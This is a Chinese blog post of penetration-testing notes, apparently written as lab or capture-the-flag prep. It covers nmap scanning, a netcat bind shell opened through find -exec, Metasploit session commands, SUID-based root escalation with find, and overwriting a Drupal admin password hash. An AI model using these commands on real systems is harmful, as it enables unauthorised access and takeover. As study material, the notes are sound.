携手创作,共同成长!这是我参与「掘金日新计划 · 8 月更文挑战」的第5天,点击查看活动详情 ip扫描内网存活主机的方法
局域网探测:arp-scan -l #需要root权限执行
nmap -sP 192.168.0.1/24
扫描IP开放端口的方法
nmap -A -p1-65535 -T4 IP
扫扫描该网段的存活主机和开放的IP
nmap 192.168.144.0/24
meterpreter建立shell连接 先输入shell再输入方法一
方法一:
shell #权限,不是本地,是http链接,需要一个持久链接,反弹一个交互shell
python -c "import pty;pty.spawn('/bin/bash')"
方法二:
find /var/www/test -exec nc -lvp 9999 -e /bin/sh ;
nc 192.168.0.119 999
退出交互式shell exit
MSF基本操作使用
我们要想从 meterpreter 退出到MSF框架,输入:background
要想不适用这个EXP就用back退出
输入: sessions -l 查看我们获得的shell,前面有id
输入: session -i 1
set exitonsession false 可以让建立监听的端口继续保持侦听。可以接受多个session
exploit -j #后台监听
即可切换到id为1的shell
上传文件 upload 本地文件目录 远程文件目录
Linux基本操作
Linux显示当前所在目录命令:pwd
Linux输出文件的内容:cat 文件名
Linux more命令:
Linux more 命令类似 cat ,不过会以一页一页的形式显示,更方便使用者逐页阅读,而最基本的指令就是按空白键(space)就往下一页显示,按 b 键就会往回(back)一页显示,而且还有搜寻字串的功能(与 vi 相似),使用中的说明文件,请按 h
q退出more
searchsploit命令:寻找exploit详细信息
更新searchsploit -u
/etc/passwd 用户数据库,其中的域给出了用户名、真实姓名、家目录、加密的口令和用户的其他信息.
查看具有root权限的命令这三条都可以查询
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb { }
find命令:-exec: find命令对匹配的文件执行该参数所给出的shell命令。相应命令的形式为’command’ { } ;,注意{ }和\;之间的空格。
find text -exec "whoami" ;
find / -name 666 -exec "/bin/sh" ;
bin/sh的意思是是指此脚本使用/bin/sh来解释执行
find是root权限,用root创建的bin/sh也是root权限
touch命令 如果没有这个文件会自动创建这个名字的文件
find提权就是利用find是root权限 用exec直接把/bin/sh运行到touch创建的文件里执行
Mysql基本操作
MySQL常用语句一、连接MySQL格式:mysql-h主机地址-u用户名-p(p后面不要加用户密码他会自动提示输入,加上就会报错)
退出mysql : exit;
update 表名 set 字段="" where 字段=''
(where后面是限制条件)
Drupal重置密码:
方法二:这是drupal提供的最原生的方法
在windows下,打开命令行客户端(cmd),切换到Drupal7项目所在的目录,敲入以下命令:
php scripts/password-hash.sh admin
输出:
password: admin hash: DMtruNEVmqWoqhlPwTlnFzwyBRFgQwXUfppe9pW1RqqXlMy97tzA
然后到数据库中,查users表,找到对应的用户名,修改密码,将上述的hash值复制到密码字段,保存即可。
Drupal的默认配置文件为 /var/www/sites/default/settings.php